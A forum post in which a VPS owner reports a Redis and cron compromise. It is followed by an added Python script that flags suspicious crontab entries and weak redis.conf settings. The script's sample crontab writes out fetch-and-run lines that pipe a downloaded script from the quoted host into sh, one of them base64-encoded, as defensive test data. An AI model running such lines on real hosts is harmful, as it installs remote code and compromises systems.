Hello,
I have identified a potential security breach on my VPS, which is running Dockerized services, including Redis. Upon investigating unusual behavior, I discovered the following issues:
- Redis database compromised:
  - The `dump.rdb` file and related Redis data files contain unexpected, suspicious content.
  - The database seems to be corrupted or manipulated.
- Malicious cron jobs:
  - Several cron jobs were added to the system without authorization. These jobs execute encoded commands via `base64` and download scripts from external sources (e.g., http://b.9-9-11.com/t.sh).
- Redis logs and operations:
  - The Redis logs show continuous saving of the database but return `nil` for expected keys, suggesting either corruption or unauthorized manipulation.
Steps I have taken:
- Disconnected the VPS from the network.
- Verified the integrity of Redis files and identified suspicious entries.
- Removed malicious cron jobs and scripts.
This incident highlights a potential vulnerability, either in Redis, Docker configuration, or the underlying system.
Please advise on the following:
- Additional steps to secure Redis and Docker environments.
- Recommendations for mitigating and preventing similar breaches.
- Best practices for cleaning and securing a potentially compromised system.
Thank you for your assistance.
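Two checks that follow from the indicators in the post above (cron entries that run base64-decoded or downloaded commands, and Redis settings that let an unauthenticated client write files), as an added example that is not part of the original post and not the poster's own tooling. The sample crontab and the two `redis.conf` excerpts are constructed: the URL is the one quoted in the post, the other cron entries and all config values are invented, and the `requirepass` value is a placeholder.

```python
"""Triage helpers for the indicators in the post: cron entries that decode or
download commands, and Redis settings that expose the instance. Added example;
the crontab and redis.conf samples below are constructed, not the poster's."""
import base64
import binascii
import re

# Constructed sample crontab. The payload is encoded here so the sample
# round-trips; only the URL comes from the post, the rest is invented.
_PAYLOAD = b"curl -fsSL http://b.9-9-11.com/t.sh | sh"
_ENCODED = base64.b64encode(_PAYLOAD).decode()
SAMPLE_CRONTAB = f"""\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * echo {_ENCODED} | base64 -d | bash
@reboot root (curl -fsSL http://b.9-9-11.com/t.sh || wget -q -O- http://b.9-9-11.com/t.sh) | sh
30 4 * * * /usr/local/bin/backup.sh
"""

# Constructed weak settings consistent with the post's symptoms, beside a
# hardened counterpart (placeholder secret, not a real one).
WEAK_REDIS_CONF = """\
bind 0.0.0.0
protected-mode no
dir /data
dbfilename dump.rdb
"""
HARDENED_REDIS_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command DEBUG ""
dir /data
dbfilename dump.rdb
"""

BASE64_DECODE = re.compile(r"base64\s+(?:-d\b|--decode\b)")
FETCH = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"|;)]+")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_payloads(command):
    """Decode each base64-looking token that yields readable text; tokens that
    are mis-padded or decode to binary (e.g. a path like /usr/bin/certbot)
    are skipped."""
    decoded = []
    for tok in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            decoded.append(text)
    return decoded


def triage_crontab(text):
    """One finding per entry that decodes a base64 command or fetches from the
    network, listing every URL seen in the entry or in its decoded payload.
    Accepts user crontabs and /etc/crontab-style lines with a user field."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons, urls = [], set(URL.findall(entry))
        if BASE64_DECODE.search(entry):
            reasons.append("base64-decoded command")
            for payload in decode_base64_payloads(entry):
                urls.update(URL.findall(payload))
                if FETCH.search(payload):
                    reasons.append("decoded payload downloads from network")
        if FETCH.search(entry):
            reasons.append("downloads from network")
        if reasons:
            findings.append({"line": lineno, "entry": entry,
                             "reasons": reasons, "urls": sorted(urls)})
    return findings


def audit_redis_conf(text):
    """Flag settings that let an unauthenticated remote client reach Redis or
    use CONFIG SET dir/dbfilename to pick where SAVE writes dump.rdb."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            settings.setdefault(key.lower(), []).append(value.strip())
    issues = []
    if "requirepass" not in settings:
        issues.append("no requirepass: any client that reaches the port has full access")
    bind_tokens = {t for v in settings.get("bind", []) for t in v.split()}
    if not bind_tokens or bind_tokens & {"0.0.0.0", "*", "::", "-::*"}:
        issues.append("bind exposes Redis on every interface")
    if settings.get("protected-mode", ["yes"])[-1].lower() == "no":
        issues.append("protected-mode no: unauthenticated remote access is allowed")
    renamed = {v.split()[0].upper() for v in settings.get("rename-command", []) if v.split()}
    for cmd in ("CONFIG", "DEBUG"):
        if cmd not in renamed:
            issues.append(f"{cmd} command is not renamed or disabled")
    return issues


if __name__ == "__main__":
    for f in triage_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']}: {', '.join(f['reasons'])} -> {f['urls']}")
    print("weak conf:", audit_redis_conf(WEAK_REDIS_CONF))
    print("hardened conf:", audit_redis_conf(HARDENED_REDIS_CONF))
```

On a real host, feed `triage_crontab` copies of every user's `crontab -l`, `/etc/crontab`, `/etc/cron.d/*` and `/var/spool/cron/*`, taken before cleanup so the findings survive as evidence. For the Dockerized case one caveat matters more than the config file: Redis inside a container has to bind a container interface to be reachable at all, so exposure is decided by the port mapping, and `-p 6379:6379` publishes it on every host interface through Docker's own iptables chain, which host firewall rules on the INPUT chain do not cover. Publish as `-p 127.0.0.1:6379:6379` or not at all, and put the application on a user-defined Docker network instead.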